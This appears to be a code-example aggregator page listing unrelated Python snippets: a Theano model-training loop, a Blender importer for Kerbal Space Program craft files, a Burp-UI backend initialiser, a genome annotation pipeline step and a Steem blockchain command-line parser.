chunks_train_idcs = range(num_chunks_train)
losses_train = []
losses_eval_valid = []
losses_eval_train = []
losses_eval_valid_kaggle = []
losses_eval_train_kaggle = []
create_train_gen = partial(config().create_train_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()# + ["patients"],
)
create_eval_valid_gen = partial(config().create_eval_valid_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()# + ["patients"]
)
create_eval_train_gen = partial(config().create_eval_train_gen,
required_input_keys = xs_shared.keys(),
required_output_keys = ys_shared.keys()
)
print "Train model"
start_time = time.time()
prev_time = start_time
num_batches_chunk = config().batches_per_chunk
for e, train_data in izip(chunks_train_idcs, buffering.buffered_gen_threaded(create_train_gen())):
print "Chunk %d/%d" % (e + 1, num_chunks_train)
epoch = (1.0 * config().batch_size * config().batches_per_chunk * (e+1) / NUM_TRAIN_PATIENTS)
print " Epoch %.1f" % epoch
for key, rate in learning_rate_schedule.iteritems():
if epoch >= key:
lr = np.float32(rate)
learning_rate.set_value(lr)
print " learning rate %.7f" % lr
if config().dump_network_loaded_data:
pickle.dump(train_data, open("data_loader_dump_train_%d.pkl"%e, "wb"))
for key in xs_shared:
xs_shared[key].set_value(train_data["input"][key])
for key in ys_shared:
ys_shared[key].set_value(train_data["output"][key])
#print "train:", sorted(train_data["output"]["patients"])
losses = []
kaggle_losses = []
segmentation_losses = []
for b in xrange(num_batches_chunk):
iter_result = iter_train(b)
loss, kaggle_loss, segmentation_loss = tuple(iter_result[:3])
utils.detect_nans(loss, xs_shared, ys_shared, all_params)
losses.append(loss)
kaggle_losses.append(kaggle_loss)
segmentation_losses.append(segmentation_loss)
mean_train_loss = np.mean(losses)
print " mean training loss:\t\t%.6f" % mean_train_loss
losses_train.append(mean_train_loss)
print " mean kaggle loss:\t\t%.6f" % np.mean(kaggle_losses)
print " mean segment loss:\t\t%.6f" % np.mean(segmentation_losses)
if ((e + 1) % config().validate_every) == 0:
print
print "Validating"
if config().validate_train_set:
subsets = ["validation", "train"]
gens = [create_eval_valid_gen, create_eval_train_gen]
losses_eval = [losses_eval_valid, losses_eval_train]
losses_kaggle = [losses_eval_valid_kaggle, losses_eval_train_kaggle]
else:
subsets = ["validation"]
gens = [create_eval_valid_gen]
losses_eval = [losses_eval_valid]
losses_kaggle = [losses_eval_valid_kaggle]
for subset, create_gen, losses_validation, losses_kgl in zip(subsets, gens, losses_eval, losses_kaggle):
vld_losses = []
vld_kaggle_losses = []
vld_segmentation_losses = []
vld_other_losses = {k:[] for k,_ in validation_other_losses.items()}
print " %s set (%d samples)" % (subset, get_number_of_validation_samples(set=subset))
for validation_data in buffering.buffered_gen_threaded(create_gen()):
num_batches_chunk_eval = config().batches_per_chunk
if config().dump_network_loaded_data:
pickle.dump(validation_data, open("data_loader_dump_valid_%d.pkl"%e, "wb"))
for key in xs_shared:
xs_shared[key].set_value(validation_data["input"][key])
for key in ys_shared:
ys_shared[key].set_value(validation_data["output"][key])
#print "validate:", validation_data["output"]["patients"]
for b in xrange(num_batches_chunk_eval):
losses = tuple(iter_validate(b)[:3+len(validation_other_losses)])
loss, kaggle_loss, segmentation_loss = losses[:3]
other_losses = losses[3:]
vld_losses.extend(loss)
vld_kaggle_losses.extend(kaggle_loss)
vld_segmentation_losses.extend(segmentation_loss)
for k, other_loss in zip(validation_other_losses, other_losses):
vld_other_losses[k].extend(other_loss)
vld_losses = np.array(vld_losses)
vld_kaggle_losses = np.array(vld_kaggle_losses)
vld_segmentation_losses = np.array(vld_segmentation_losses)
for k in validation_other_losses:
vld_other_losses[k] = np.array(vld_other_losses[k])
# now select only the relevant section to average
sunny_len = get_lenght_of_set(name="sunny", set=subset)
regular_len = get_lenght_of_set(name="regular", set=subset)
num_valid_samples = get_number_of_validation_samples(set=subset)
#print losses[:num_valid_samples]
#print kaggle_losses[:regular_len]
#print segmentation_losses[:sunny_len]
loss_to_save = obj.compute_average(vld_losses[:num_valid_samples])
print " mean training loss:\t\t%.6f" % loss_to_save
print " mean kaggle loss:\t\t%.6f" % np.mean(vld_kaggle_losses[:regular_len])
print " mean segment loss:\t\t%.6f" % np.mean(vld_segmentation_losses[:sunny_len])
# print " acc:\t%.2f%%" % (acc * 100)
for k, v in vld_other_losses.items():
print " mean %s loss:\t\t%.6f" % (k, obj.compute_average(v[:num_valid_samples], loss_name=k))
print
losses_validation.append(loss_to_save)
kaggle_to_save = np.mean(vld_kaggle_losses[:regular_len])
losses_kgl.append(kaggle_to_save)
now = time.time()
time_since_start = now - start_time
time_since_prev = now - prev_time
prev_time = now
est_time_left = time_since_start * (float(num_chunks_train - (e + 1)) / float(e + 1 - chunks_train_idcs[0]))
eta = datetime.now() + timedelta(seconds=est_time_left)
eta_str = eta.strftime("%c")
print " %s since start (%.2f s)" % (utils.hms(time_since_start), time_since_prev)
print " estimated %s to go (ETA: %s)" % (utils.hms(est_time_left), eta_str)
print
if ((e + 1) % config().save_every) == 0:
print
print "Saving metadata, parameters"
with open(metadata_path, 'w') as f:
pickle.dump({
'metadata_path': metadata_path,
'configuration_file': config().__name__,
'git_revision_hash': utils.get_git_revision_hash(),
'experiment_id': expid,
'chunks_since_start': e,
'losses_train': losses_train,
'losses_eval_train': losses_eval_train,
'losses_eval_train_kaggle': losses_eval_train_kaggle,
'losses_eval_valid': losses_eval_valid,
'losses_eval_valid_kaggle': losses_eval_valid_kaggle,
'time_since_start': time_since_start,
'param_values': lasagne.layers.get_all_param_values(top_layer)
}, f, pickle.HIGHEST_PROTOCOL)
print " saved to %s" % metadata_path
print
# store all known outputs from last batch:
if config().take_a_dump:
all_theano_variables = [train_loss_theano, kaggle_loss_theano, segmentation_loss_theano] + theano_printer.get_the_stuff_to_print()
for layer in all_layers[:-1]:
all_theano_variables.append(lasagne.layers.helper.get_output(layer))
iter_train = theano.function([idx], all_theano_variables,
givens=givens, on_unused_input="ignore", updates=updates,
# mode=NanGuardMode(nan_is_error=True, inf_is_error=True, big_is_error=True)
)
train_data["intermediates"] = iter_train(0)
pickle.dump(train_data, open(metadata_path + "-dump", "wb"))
return
0
Example 55
Project: io_kspblender Source File: import_craft.py
def import_parts(filepath,partdir,right_scale,right_location):
ksp = get_kspdir()
for obj in bpy.context.scene.objects:
obj.select = False
craft = kspcraft(filepath)
print(craft.ship + ' ready for takeoff\n')
print(str(craft.num_parts()) + ' parts found...')
partslist = craft.partslist
doneparts = {} # keep track of parts that have already been imported so I can save time
doneobj = set(bpy.data.objects) # know which objects have gone through the cleaning process
scn = bpy.context.scene # the active scene
#cursor_loc = get_cursor_location()
#to_ground = partslist[0].pos[2]
for part in partslist:
part.partName = part.partName.replace('.','_')
if os.path.isfile(partdir[part.partName][0]): # make sure the part file exists so nothing crashes
print("\n----------------------------------------------------\n") # to make console output easier to look at
if part.partName not in doneparts: # if part has not been imported...
print("Importing "+part.partName+" as "+part.part) # ...say so on the console
bpy.ops.import_object.ksp_mu(filepath=partdir[part.partName][0]) # call the importer
newpart = bpy.context.active_object # set the imported part object to active. from here on, part refers to the part data structure and object to the blender object
newpart.select = True
newpart.name = part.part # rename the object according to the part name (including the number)
newpart.location = Vector(part.pos)#+cursor_loc # move the object
newpart.rotation_quaternion = part.rotQ # rotate the object
if part.partName in right_scale:
newpart.select = True
newpart.scale = right_scale[part.partName]
bpy.ops.object.transform_apply(location = False, rotation = False, scale = True)
bpy.ops.object.select_all(action = 'DESELECT')
print("Scale corrected")
#setup to make lod parts
#meme = bpy.data.meshes.new(part.partName+"_low")
#objobj = bpy.data.objects.new(part.partName+"_low",meme)
#objobj.location = newpart.location
#scn.objects.link(objobj)
print("\n")
# Set a bunch of properties
newpart["partName"] = part.partName
newpart["partClass"] = partdir[part.partName][1]
newpart["mir"] = part.mir
newpart["symMethod"] = part.symMethod
newpart["istg"] = part.istg
newpart["dstg"] = part.dstg
newpart["sidx"] = part.sidx
newpart["sqor"] = part.sqor
newpart["attm"] = part.attm
newpart["modCost"] = part.modCost
newpart["modMass"] = part.modMass
newpart["modSize"] = part.modSize
newpart["ship"] = craft.ship
#newpart["linklist"] = part.linklist
#newpart["attNlist"] = part.attNlist
#newpart["symlist"] = part.symlist
#newpart["srfNlist"] = part.srfNlist ### FIX THESE
newpart["tgt"] = part.tgt
newpart["tgtpos"] = part.tgtpos
newpart["tgtrot"] = part.tgtrot
newpart["tgtdir"] = part.tgtdir
else: # but if part has been imported...
hiddenlist = [] # clunky workaround
for obj in bpy.data.objects: # hidden objects cannot be modified (duplication is what I want to do)
if not obj.is_visible(scn): # find all hidden objects
hiddenlist.append(obj) # create a big stupid list
scn.objects.active = obj # always need to do this to get things to actually happen to objects
obj.hide = False # unhide each one
bpy.ops.object.select_all(action = 'DESELECT') # deselect everything
print("Duplicating "+part.partName+" as "+part.part+"\n") # let me know if the part is just being duplicated
oldpart = bpy.data.objects[doneparts[part.partName]] # have to select the object (2 step process)
oldpart.select = True
bpy.context.scene.objects.active = oldpart
print(oldpart)
bpy.ops.object.select_grouped(type = 'CHILDREN_RECURSIVE') # select all children of the parent object (the empty), which deselects the parent
bpy.data.objects[doneparts[part.partName]].select = True # so reselect the parent
bpy.ops.object.duplicate_move_linked() # duplicate the whole family
copiedpart = oldpart.name + ".001" # the duplicate will be called something.001 always
bpy.ops.object.select_all(action = 'DESELECT') # deselect everything
newpart = bpy.data.objects[copiedpart] # and select just the parent (again, multi-step process)
newpart.select = True
bpy.context.scene.objects.active = newpart
print(bpy.context.active_object)
newpart.name = part.part # rename it
newpart.location = Vector(part.pos)#+cursor_loc # move it
newpart.rotation_quaternion = part.rotQ # rotate it
for obj in hiddenlist: # hide all that annoying stuff again
obj.hide = True
if part.partName in right_location:
newpart.select = True
bpy.ops.transform.translate(value=right_location[part.partName],constraint_axis=(False,False,False),constraint_orientation='LOCAL',mirror=False,proportional='DISABLED',proportional_edit_falloff='SMOOTH',proportional_size=1)
bpy.ops.object.select_all(action = 'DESELECT')
print("Location corrected")
if part.partName not in doneparts: # if the part hasn't been imported before...
doneparts[part.partName] = part.part # ...it has now
objlist = set([obj for obj in bpy.data.objects if obj not in doneobj]) # find all the newly added objects
doneobj = set(bpy.data.objects) # done dealing with all the objects that are now in the scene (except for the ones I'm about to work with in objlist)
emptysize = []
if part.partName == "strutConnector":
add_strut(part,objlist)
elif part.partName == "fuelLine":
add_fuelline(part,objlist)
elif part.partName == "launchClamp1":
add_launchclamp(part,objlist)
else:
for obj in objlist: # for all the unprocesses objects
print(obj.name) # let me know which one we're on
obj['ship'] = craft.ship
if obj.type == 'EMPTY': # if it's an Empty object
if obj.parent != None: # if the Empty is not top-level
obj.hide = True # hide that shyet
print(obj.name + " Hidden\n") # and tell me that they're gone
else: # but if it is top level
obj.empty_draw_type = 'SPHERE' # make that shyet a sphere
obj.empty_draw_size = 0 # a hella tiny sphere
if obj.type == 'MESH': # if it's a Mesh object
scn.objects.active = obj # make it active
if "KSP" not in obj.name:
if obj.data.materials:
material_fixer(obj,part)
#print(1)
#while len(obj.data.materials) > 0:
#obj.data.materials.pop(0, update_data=True)
#bpy.ops.object.material_slot_remove()
bpy.ops.object.mode_set(mode='EDIT') # go into edit mode
bpy.ops.mesh.remove_doubles(threshold = 0.0001) # remove double vertices
bpy.ops.mesh.normals_make_consistent(inside = False) # fix normals
bpy.ops.object.mode_set(mode='OBJECT') # leave edit mode
if len(obj.data.uv_layers):
if "_fixed" not in obj.data.uv_layers[0].name:
obj.data.uv_layers.active.name+="_fixed"
for uvvertex in obj.data.uv_layers.active.data:
uvvertex.uv[1] = -uvvertex.uv[1] + 1
obj.select = True
bpy.ops.object.shade_smooth()
obj.data.use_auto_smooth = True
obj.data.auto_smooth_angle = .610865
bpy.ops.object.select_all(action = 'DESELECT')
if len(obj.data.polygons) == 0: # and if it's one of them stupid fake meshes with no faces
obj.hide = True # gtfo
obj.hide_render = True
root = obj
meshrad = math.sqrt((obj.dimensions[0]/2)**2 + (obj.dimensions[1]/2)**2 + (obj.dimensions[2]/2)**2) # find the radius of the parent Empty such that it encloses the object
emptysize.append(meshrad)
if "coll" in obj.name or "COL" in obj.name or "Col" in obj.name or "fair" in obj.name and 'KSP' not in obj.name: # if it is named anything to do with collider, I'll have none of it
obj.hide = True # gtfo
obj.hide_render = True # really gtfo (don't even render)
#object.select = True # and if I'm really mad
#bpy.ops.object.delete() # I could just delete it
if obj.type != 'EMPTY': # and if it is a mesh (the empties have already been hidden, so this is a double-tap on them)...
print(obj.name + " Hidden\n") # ...let me know
action_fixer(obj)
# for obj in objlist:
# if "KSP" not in obj.name and obj.type == 'MESH':
# if obj.data.materials:
# materialpreserver.main(obj,part)
if part.part in bpy.data.objects: #won't crash and burn here
scn.objects.active = bpy.data.objects[part.part]
if emptysize:
radius = max(emptysize)
else:
radius = bpy.context.active_object.empty_draw_size
if radius < .25:
radius = 0.25
bpy.data.objects[part.part].empty_draw_size = radius
else:
print(part.part + " not imported for some reason... let me know which part!")
bpy.ops.object.select_all(action = 'DESELECT')
print("\n----------------------------------------------------\n")
return craft
0
Example 56
def __init__(self, server=None, conf=None):
"""
:param server: ``Burp-UI`` server instance in order to access logger
and/or some global settings
:type server: :class:`burpui.server.BUIServer`
:param conf: Configuration to use
:type conf: :class:`burpui.config.BUIConfig`
"""
self.proc = None
self.app = server
self.client_version = None
self.server_version = None
self.batch_list_supported = False
self.zip64 = G_ZIP64
self.timeout = G_TIMEOUT
self.burpbin = G_BURPBIN
self.stripbin = G_STRIPBIN
self.burpconfcli = G_BURPCONFCLI
self.burpconfsrv = G_BURPCONFSRV
self.includes = G_INCLUDES
self.revoke = G_REVOKE
self.enforce = G_ENFORCE
self.defaults = {
'Burp2': {
'burpbin': G_BURPBIN,
'stripbin': G_STRIPBIN,
'bconfcli': G_BURPCONFCLI,
'bconfsrv': G_BURPCONFSRV,
'timeout': G_TIMEOUT,
'tmpdir': G_TMPDIR,
},
'Experimental': {
'zip64': G_ZIP64,
},
'Security': {
'includes': G_INCLUDES,
'revoke': G_REVOKE,
'enforce': G_ENFORCE,
},
}
tmpdir = G_TMPDIR
self.running = []
version = ''
if conf is not None:
conf.update_defaults(self.defaults)
conf.default_section('Burp2')
self.burpbin = self._get_binary_path(
conf,
'burpbin',
G_BURPBIN,
sect='Burp2'
)
self.stripbin = self._get_binary_path(
conf,
'stripbin',
G_STRIPBIN,
sect='Burp2'
)
confcli = conf.safe_get(
'bconfcli'
)
confsrv = conf.safe_get(
'bconfsrv'
)
self.timeout = conf.safe_get(
'timeout',
'integer'
)
tmpdir = conf.safe_get(
'tmpdir'
)
# Experimental options
self.zip64 = conf.safe_get(
'zip64',
'boolean',
section='Experimental'
)
# Security options
self.includes = conf.safe_get(
'includes',
'force_list',
section='Security'
)
self.enforce = conf.safe_get(
'enforce',
'boolean',
section='Security'
)
self.revoke = conf.safe_get(
'revoke',
'boolean',
section='Security'
)
if confcli and not os.path.isfile(confcli):
self.logger.warning(
"The file '%s' does not exist",
confcli
)
confcli = G_BURPCONFCLI
if confsrv and not os.path.isfile(confsrv):
self.logger.warning(
"The file '%s' does not exist",
confsrv
)
confsrv = G_BURPCONFSRV
if not self.burpbin:
# The burp binary is mandatory for this backend
raise Exception(
'This backend *CAN NOT* work without a burp binary'
)
self.burpconfcli = confcli
self.burpconfsrv = confsrv
if (tmpdir and os.path.exists(tmpdir) and
not os.path.isdir(tmpdir)):
self.logger.warning(
"'%s' is not a directory",
tmpdir
)
if tmpdir == G_TMPDIR:
raise IOError(
"Cannot use '{}' as tmpdir".format(tmpdir)
)
tmpdir = G_TMPDIR
if os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
raise IOError(
"Cannot use '{}' as tmpdir".format(tmpdir)
)
if tmpdir and not os.path.exists(tmpdir):
os.makedirs(tmpdir)
self.tmpdir = tmpdir
# check the burp version because this backend only supports clients
# newer than BURP_MINIMAL_VERSION
try:
cmd = [self.burpbin, '-v']
version = subprocess.check_output(
cmd,
universal_newlines=True
).rstrip()
if version < BURP_MINIMAL_VERSION:
raise Exception(
'Your burp version ({}) does not fit the minimal'
' requirements: {}'.format(version, BURP_MINIMAL_VERSION)
)
except subprocess.CalledProcessError as exp:
raise Exception(
'Unable to determine your burp version: {}'.format(str(exp))
)
self.client_version = version.replace('burp-', '')
self.parser = Parser(self)
self.logger.info('burp binary: {}'.format(self.burpbin))
self.logger.info('strip binary: {}'.format(self.stripbin))
self.logger.info('burp conf cli: {}'.format(self.burpconfcli))
self.logger.info('burp conf srv: {}'.format(self.burpconfsrv))
self.logger.info('command timeout: {}'.format(self.timeout))
self.logger.info('burp version: {}'.format(self.client_version))
self.logger.info('tmpdir: {}'.format(self.tmpdir))
self.logger.info('zip64: {}'.format(self.zip64))
self.logger.info('includes: {}'.format(self.includes))
self.logger.info('enforce: {}'.format(self.enforce))
self.logger.info('revoke: {}'.format(self.revoke))
try:
# make the connection
self.status()
except BUIserverException:
pass
0
Example 57
def execute(self, args):
"""At a minimum, write a fasta, gff and tbl to output directory. Optionally do more."""
# Verify and read fasta file
fastapath = args.fasta
if not os.path.isfile(fastapath):
sys.stderr.write("Failed to find " + fastapath + ". No genome was loaded.\n")
sys.exit()
sys.stderr.write("Reading fasta...\n")
self.read_fasta(fastapath)
sys.stderr.write("Done.\n")
# Create output directory
out_dir = "gag_output"
if args.out:
out_dir = args.out
os.system('mkdir ' + out_dir)
# Verify and read gff file
# This step also writes genome.ignored.gff,
# genome.invalid.gff and genome.comments.gff
gffpath = args.gff
if not os.path.isfile(gffpath):
sys.stderr.write("Failed to find " + gffpath + ". No genome was loaded.")
return
sys.stderr.write("Reading gff...\n")
self.read_gff(gffpath, out_dir)
sys.stderr.write("Done.\n")
# Calculate stats before genome is modified
sys.stderr.write("Calculating stats on original genome\n")
for seq in self.seqs:
self.stats_mgr.update_ref(seq.stats())
# Optional annotation step
if args.anno:
anno_filename = args.anno
self.annotate_from_file(anno_filename)
# Optional step to trim sequences, subsequences or features
if args.trim:
trim_filename = args.trim
self.trim_from_file(trim_filename)
# Optional step to create start and stop codons
if args.fix_start_stop:
sys.stderr.write("Creating start and stop codons...\n")
self.fix_start_stop_codons()
# Optional step to fix terminal Ns
if args.fix_terminal_ns:
sys.stderr.write("Fixing terminal Ns...\n")
self.fix_terminal_ns()
# Optional filtering steps
# Remove
if args.remove_cds_shorter_than:
min_length = args.remove_cds_shorter_than
sys.stderr.write("Removing CDS shorter than %s...\n" % min_length)
self.apply_filter("cds_shorter_than", min_length, "REMOVE")
if args.remove_cds_longer_than:
max_length = args.remove_cds_longer_than
sys.stderr.write("Removing CDS longer than %s...\n" % max_length)
self.apply_filter("cds_longer_than", max_length, "REMOVE")
if args.remove_exons_shorter_than:
min_length = args.remove_exons_shorter_than
sys.stderr.write("Removing exons shorter than %s...\n" % min_length)
self.apply_filter("exon_shorter_than", min_length, "REMOVE")
if args.remove_exons_longer_than:
max_length = args.remove_exons_longer_than
sys.stderr.write("Removing exons longer than %s...\n" % max_length)
self.apply_filter("exon_longer_than", max_length, "REMOVE")
if args.remove_introns_shorter_than:
min_length = args.remove_introns_shorter_than
sys.stderr.write("Removing exons shorter than %s...\n" % min_length)
self.apply_filter("intron_shorter_than", min_length, "REMOVE")
if args.remove_introns_longer_than:
max_length = args.remove_introns_longer_than
sys.stderr.write("Removing exons longer than %s...\n" % max_length)
self.apply_filter("intron_longer_than", max_length, "REMOVE")
if args.remove_genes_shorter_than:
min_length = args.remove_genes_shorter_than
sys.stderr.write("Removing genes shorter than %s...\n" % min_length)
self.apply_filter("gene_shorter_than", min_length, "REMOVE")
if args.remove_genes_longer_than:
max_length = args.remove_genes_longer_than
sys.stderr.write("Removing genes longer than %s...\n" % max_length)
self.apply_filter("gene_longer_than", max_length, "REMOVE")
# Flag
if args.flag_cds_shorter_than:
min_length = args.flag_cds_shorter_than
sys.stderr.write("Flagging CDS shorter than %s...\n" % min_length)
self.apply_filter("cds_shorter_than", min_length, "FLAG")
if args.flag_cds_longer_than:
max_length = args.flag_cds_longer_than
sys.stderr.write("Flagging CDS longer than %s...\n" % max_length)
self.apply_filter("cds_longer_than", max_length, "FLAG")
if args.flag_exons_shorter_than:
min_length = args.flag_exons_shorter_than
sys.stderr.write("Flagging exons shorter than %s...\n" % min_length)
self.apply_filter("exon_shorter_than", min_length, "FLAG")
if args.flag_exons_longer_than:
max_length = args.flag_exons_longer_than
sys.stderr.write("Flagging exons longer than %s...\n" % max_length)
self.apply_filter("exon_longer_than", max_length, "FLAG")
if args.flag_introns_shorter_than:
min_length = args.flag_introns_shorter_than
sys.stderr.write("Flagging exons shorter than %s...\n" % min_length)
self.apply_filter("intron_shorter_than", min_length, "FLAG")
if args.flag_introns_longer_than:
max_length = args.flag_introns_longer_than
sys.stderr.write("Flagging exons longer than %s...\n" % max_length)
self.apply_filter("intron_longer_than", max_length, "FLAG")
if args.flag_genes_shorter_than:
min_length = args.flag_genes_shorter_than
sys.stderr.write("Flagging genes shorter than %s...\n" % min_length)
self.apply_filter("gene_shorter_than", min_length, "FLAG")
if args.flag_genes_longer_than:
max_length = args.flag_genes_longer_than
sys.stderr.write("Flagging genes longer than %s...\n" % max_length)
self.apply_filter("gene_longer_than", max_length, "FLAG")
# Write fasta, gff and tbl file to output folder
# Open files
fasta = open(out_dir + '/genome.fasta', 'w')
gff = open(out_dir + '/genome.gff', 'w')
tbl = open(out_dir + '/genome.tbl', 'w')
proteins = open(out_dir + '/genome.proteins.fasta', 'w')
removed = open(out_dir + '/genome.removed.gff', 'w')
stats_file = open(out_dir + '/genome.stats', 'w')
# Calculate stats on modified genome
sys.stderr.write("Calculating stats on modified genome\n")
for seq in self.seqs:
self.stats_mgr.update_alt(seq.stats())
# Write stats file
sys.stderr.write("Writing stats file to " + out_dir + "/ ...\n")
for line in self.stats_mgr.summary():
stats_file.write(line)
# Write fasta, gff, tbl, protein fasta
sys.stderr.write("Writing gff, tbl and fasta to " + out_dir + "/ ...\n")
gff.write("##gff-version 3\n")
for seq in self.seqs:
fasta.write(seq.to_fasta())
gff.write(seq.to_gff())
if not args.skip_empty_scaffolds or len(seq.genes) > 0:
# Possibly skip empty sequences
tbl.write(seq.to_tbl())
proteins.write(seq.to_protein_fasta())
# Write removed.gff
for feature in self.removed_features:
removed.write(feature.to_gff())
# Close files
gff.close()
tbl.close()
fasta.close()
proteins.close()
removed.close()
stats_file.close()
0
Example 58
def main() :
global args
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Command line tool to interact with the Steem network"
)
"""
Default settings for all tools
"""
parser.add_argument(
'--node',
type=str,
default=config["node"],
help='Websocket URL for public Steem API (default: "wss://this.piston.rocks/")'
)
parser.add_argument(
'--rpcuser',
type=str,
default=config["rpcuser"],
help='Websocket user if authentication is required'
)
parser.add_argument(
'--rpcpassword',
type=str,
default=config["rpcpassword"],
help='Websocket password if authentication is required'
)
parser.add_argument(
'--nobroadcast', '-d',
action='store_true',
help='Do not broadcast anything'
)
parser.add_argument(
'--nowallet', '-p',
action='store_true',
help='Do not load the wallet'
)
parser.add_argument(
'--unsigned', '-x',
action='store_true',
help='Do not try to sign the transaction'
)
parser.add_argument(
'--expires', '-e',
default=30,
help='Expiration time in seconds (defaults to 30)'
)
parser.add_argument(
'--verbose', '-v',
type=int,
default=3,
help='Verbosity'
)
parser.add_argument('--version', action='version',
version='%(prog)s {version}'.format(version=__VERSION__))
subparsers = parser.add_subparsers(help='sub-command help')
"""
Command "set"
"""
setconfig = subparsers.add_parser('set', help='Set configuration')
setconfig.add_argument(
'key',
type=str,
choices=availableConfigurationKeys,
help='Configuration key'
)
setconfig.add_argument(
'value',
type=str,
help='Configuration value'
)
setconfig.set_defaults(command="set")
"""
Command "config"
"""
configconfig = subparsers.add_parser('config', help='Show local configuration')
configconfig.set_defaults(command="config")
"""
Command "info"
"""
parser_info = subparsers.add_parser('info', help='Show infos about piston and Steem')
parser_info.set_defaults(command="info")
"""
Command "changewalletpassphrase"
"""
changepasswordconfig = subparsers.add_parser('changewalletpassphrase', help='Change wallet password')
changepasswordconfig.set_defaults(command="changewalletpassphrase")
"""
Command "addkey"
"""
addkey = subparsers.add_parser('addkey', help='Add a new key to the wallet')
addkey.add_argument(
'wifkeys',
nargs='*',
type=str,
help='the private key in wallet import format (wif)'
)
addkey.set_defaults(command="addkey")
"""
Command "delkey"
"""
delkey = subparsers.add_parser('delkey', help='Delete keys from the wallet')
delkey.add_argument(
'pub',
nargs='*',
type=str,
help='the public key to delete from the wallet'
)
delkey.set_defaults(command="delkey")
"""
Command "getkey"
"""
getkey = subparsers.add_parser('getkey', help='Dump the privatekey of a pubkey from the wallet')
getkey.add_argument(
'pub',
type=str,
help='the public key for which to show the private key'
)
getkey.set_defaults(command="getkey")
"""
Command "listkeys"
"""
listkeys = subparsers.add_parser('listkeys', help='List available keys in your wallet')
listkeys.set_defaults(command="listkeys")
"""
Command "listaccounts"
"""
listaccounts = subparsers.add_parser('listaccounts', help='List available accounts in your wallet')
listaccounts.set_defaults(command="listaccounts")
"""
Command "list"
"""
parser_list = subparsers.add_parser('list', help='List posts on Steem')
parser_list.set_defaults(command="list")
parser_list.add_argument(
'--start',
type=str,
help='Start list from this identifier (pagination)'
)
parser_list.add_argument(
'--category',
type=str,
help='Only posts with in this category'
)
parser_list.add_argument(
'--sort',
type=str,
default=config["list_sorting"],
choices=["trending", "created", "active", "cashout", "payout", "votes", "children", "hot"],
help='Sort posts'
)
parser_list.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit posts by number'
)
parser_list.add_argument(
'--columns',
type=str,
nargs="+",
help='Display custom columns'
)
"""
Command "categories"
"""
parser_categories = subparsers.add_parser('categories', help='Show categories')
parser_categories.set_defaults(command="categories")
parser_categories.add_argument(
'--sort',
type=str,
default=config["categories_sorting"],
choices=["trending", "best", "active", "recent"],
help='Sort categories'
)
parser_categories.add_argument(
'category',
nargs="?",
type=str,
help='Only categories used by this author'
)
parser_categories.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit categories by number'
)
"""
Command "read"
"""
parser_read = subparsers.add_parser('read', help='Read a post on Steem')
parser_read.set_defaults(command="read")
parser_read.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to read (e.g. @xeroc/python-steem-0-1)'
)
parser_read.add_argument(
'--full',
action='store_true',
help='Show full header information (YAML formated)'
)
parser_read.add_argument(
'--comments',
action='store_true',
help='Also show all comments'
)
parser_read.add_argument(
'--parents',
type=int,
default=0,
help='Show x parents for the reply'
)
parser_read.add_argument(
'--format',
type=str,
default=config["format"],
help='Format post',
choices=["markdown", "raw"],
)
"""
Command "post"
"""
parser_post = subparsers.add_parser('post', help='Post something new')
parser_post.set_defaults(command="post")
parser_post.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Publish post as this user (requires to have the key installed in the wallet)'
)
parser_post.add_argument(
'--permlink',
type=str,
required=False,
help='The permlink (together with the author identifies the post uniquely)'
)
parser_post.add_argument(
'--category',
default=config["post_category"],
type=str,
help='Specify category'
)
parser_post.add_argument(
'--tags',
default=[],
help='Specify tags',
nargs='*',
)
parser_post.add_argument(
'--title',
type=str,
required=False,
help='Title of the post'
)
parser_post.add_argument(
'--file',
type=str,
default=None,
help='Filename to open. If not present, or "-", stdin will be used'
)
"""
Command "reply"
"""
reply = subparsers.add_parser('reply', help='Reply to an existing post')
reply.set_defaults(command="reply")
reply.add_argument(
'replyto',
type=str,
help='@author/permlink-identifier of the post to reply to (e.g. @xeroc/python-steem-0-1)'
)
reply.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Publish post as this user (requires to have the key installed in the wallet)'
)
reply.add_argument(
'--permlink',
type=str,
required=False,
help='The permlink (together with the author identifies the post uniquely)'
)
reply.add_argument(
'--title',
type=str,
required=False,
help='Title of the post'
)
reply.add_argument(
'--file',
type=str,
required=False,
help='Send file as responds. If "-", read from stdin'
)
"""
Command "edit"
"""
parser_edit = subparsers.add_parser('edit', help='Edit to an existing post')
parser_edit.set_defaults(command="edit")
parser_edit.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to edit to (e.g. @xeroc/python-steem-0-1)'
)
parser_edit.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Post an edit as another author'
)
parser_edit.add_argument(
'--file',
type=str,
required=False,
help='Patch with content of this file'
)
parser_edit.add_argument(
'--replace',
action='store_true',
help="Don't patch but replace original post (will make you lose votes)"
)
"""
Command "upvote"
"""
parser_upvote = subparsers.add_parser('upvote', help='Upvote a post')
parser_upvote.set_defaults(command="upvote")
parser_upvote.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to upvote to (e.g. @xeroc/python-steem-0-1)'
)
parser_upvote.add_argument(
'--voter',
type=str,
required=False,
default=config["default_voter"],
help='The voter account name'
)
parser_upvote.add_argument(
'--weight',
type=float,
default=config["default_vote_weight"],
required=False,
help='Actual weight (from 0.1 to 100.0)'
)
"""
Command "downvote"
"""
parser_downvote = subparsers.add_parser('downvote', help='Downvote a post')
parser_downvote.set_defaults(command="downvote")
parser_downvote.add_argument(
'--voter',
type=str,
default=config["default_voter"],
help='The voter account name'
)
parser_downvote.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to downvote to (e.g. @xeroc/python-steem-0-1)'
)
parser_downvote.add_argument(
'--weight',
type=float,
default=config["default_vote_weight"],
required=False,
help='Actual weight (from 0.1 to 100.0)'
)
"""
Command "replies"
"""
replies = subparsers.add_parser('replies', help='Show recent replies to your posts')
replies.set_defaults(command="replies")
replies.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Show replies to this author'
)
replies.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit posts by number'
)
"""
Command "transfer"
"""
